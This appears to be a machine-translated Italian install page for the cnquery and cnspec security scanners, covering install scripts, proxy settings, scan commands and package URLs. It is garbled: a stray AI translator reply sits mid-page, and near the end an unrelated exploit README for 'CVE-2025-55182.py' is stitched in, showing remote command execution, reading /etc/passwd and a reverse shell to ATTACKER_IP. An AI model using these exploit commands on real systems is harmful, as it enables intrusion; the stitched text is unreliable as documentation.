
Script di installazione per Linux, macOS e Windows per cnquery & cnspec
Il modo più semplice per installare mql e cnspec è utilizzare gli script di installazione.
https://install.mondoo.com/sh```bash
bash -c "$(curl -sSL https://install.mondoo.com/sh)"
### via PowerShell (Windows)
[`https://install.mondoo.com/ps1`](https://install.mondoo.com/ps1)```powershell
Set-ExecutionPolicy Unrestricted -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
iex ((New-Object System.Net.WebClient).DownloadString('https://install.mondoo.com/ps1'));
Install-Mondoo;
Passa il proxy allo script di installazione con -x (Linux e macOS) o -Proxy
(Windows). Lo script indirizza attraverso di esso i propri download, l'installazione
dei pacchetti, cnspec login e l'aggiornamento automatico. Il download iniziale dello
script avviene prima che il flag venga letto, quindi indirizza anche quello verso il proxy:```bash
export https_proxy='http://proxy.example.com:3128'
curl -sSL --proxy "$https_proxy" https://install.mondoo.com/sh | bash -s -- -x "$https_proxy"
I'm sorry, but I don't see any content to translate in your message. You mentioned "INPUT:" but no actual Markdown text was provided after it.
Please paste the chunk 7 content you'd like me to translate from English to Italian, and I'll return only the translated Markdown, preserving all structure, code, paths, URLs, and technical identifiers exactly as they appear.```powershell
Set-ExecutionPolicy Unrestricted -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
$wc = New-Object System.Net.WebClient;
$wc.Proxy = New-Object System.Net.WebProxy('http://proxy.example.com:3128');
iex ($wc.DownloadString('https://install.mondoo.com/ps1'));
Install-Mondoo -Proxy 'http://proxy.example.com:3128';
Su Linux e macOS un https_proxy o http_proxy ereditato viene rilevato
automaticamente quando -x non è specificato. In entrambi i casi vengono esportate entrambe le forme, quindi
anche i repository della distribuzione — che su Debian e Ubuntu sono in semplice HTTP
— vengono raggiunti attraverso il proxy. Qualsiasi no_proxy tu abbia impostato viene mantenuto
invariato, anche attraverso sudo.
L'URL del proxy deve essere un URL semplice: se contiene credenziali, codificale
in percentuale (! come %21, e così via). Il valore viene scritto nel job pianificato
dell'auto aggiornatore, quindi i caratteri che richiederebbero l'uso di virgolette in quel contesto vengono rifiutati
anziché sottoposti a escape.
Scansiona la tua piattaforma di destinazione:```bash
mql scan aws
cnspec scan aws
Registrati per un account Mondoo per accedere a più policy e archiviare i report. Per saperne di più, [contattaci](https://mondoo.com/contact).```bash
cnspec login -t 'eyJh...llZ4BW'
mql e cnspec supportano target locali e remoti, inclusi server (Linux, Windows, macOS), Cloud (AWS, Azure, Google, VMware), Kubernetes (EKS, GKE, AKS, self-managed), container, registry di container, prodotti SaaS (Google Workspace, M365, GitHub, GitLab) e altro ancora.
Esegui una scansione:```bash
cnspec scan local
cnspec scan aws cnspec scan gcp cnspec scan azure
cnspec scan k8s
cnspec scan docker image debian:12
cnspec scan docker container 00fa961d6b6a
cnspec scan ssh [email protected]
## Informazioni sul pacchetto
`https://install.mondoo.com/package/cnspec/{platform}/{arch}/{filetype}/{version}/{method}`
Gli argomenti supportano i seguenti valori:
| Argomento | Valori |
| ---------- | ---------------------------------------------------- |
| `platform` | `linux`, `windows`, `darwin` |
| `arch` | `amd64`, `arm64`, `armv7`, `armv6`, `386`, `ppc64le` |
| `filetype` | `tar.gz`, `deb`, `rpm`, `zip`, `pkg`, `msi` |
| `version` | `latest` o un numero specifico |
| `method` | `download`, `filename`, `version`, `sha256` |```bash
# Download the latest version
https://install.mondoo.com/package/cnspec/linux/arm64/rpm/latest/download
python3 CVE-2025-55182.py -u <url> -c <command>
# Esegui il comando id
python3 CVE-2025-55182.py -u http://target.com -c "id"
# Leggi un file
python3 CVE-2025-55182.py -u http://target.com -c "cat /etc/passwd"
# Reverse shell
python3 CVE-2025-55182.py -u http://target.com -c "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"
Per verificare se un server è vulnerabile senza eseguire comandi:
python3 CVE-2025-55182.py -u http://target.com --check
Questo progetto è fornito solo a scopo didattico e di ricerca sulla sicurezza. Gli autori non sono responsabili per qualsiasi uso improprio.